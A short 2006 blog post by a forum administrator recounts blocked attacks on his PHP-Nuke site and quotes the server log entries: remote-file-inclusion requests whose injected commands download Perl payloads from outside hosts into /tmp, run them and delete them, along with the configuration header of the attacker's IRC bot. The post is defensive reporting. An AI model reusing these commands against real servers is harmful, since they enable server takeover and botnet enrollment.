Sep 6, 2006

Union Injection hackers

Ever since I posted on my new anti union injection module hackers have been trying to hack my forums. Someone tell me something. Perhaps I don't usderstand this but why would a hacker show me just how he hacks a site so I can take that info and adjust my script to block such hacks?

All his atempts were blocked even by my alpha script.

modules.php?basepath=http://paupal.info/folder/cmd1.gif?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/phpnuke.txt;perl%20phpnuke.txt;rm%20-rf%20phpnuke.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo1.txt;perl%20mambo1.txt;rm%20-rf%20mambo1.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://expl0itz.com/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch

modules.php?basepath=http://paupal.info/folder/cmd.txt?&cmd=cd%20/tmp/;wget%20http://paupal.info/folder/mambo2.txt;perl%20mambo2.txt;rm%20-rf%20mambo2.*? GET HTTP/1.0
Agent: mozilla/5.0
212.55.218.196 hypernet.ch


hypernet.ch is banned

Here is part of his IRC script code.
my $linas_max='4';
my $sleep='5';
my @adms=("xxxxx","ok","mos","KKTeam");
my @canais=("#phpnuke");
my $nick='shutup';
my $ircname ='Stop';
chop (my $realname = 'uname -rs');
$servidor='mushu.tetovalive.de' unless $servidor;
my $porta='8200';

No comments: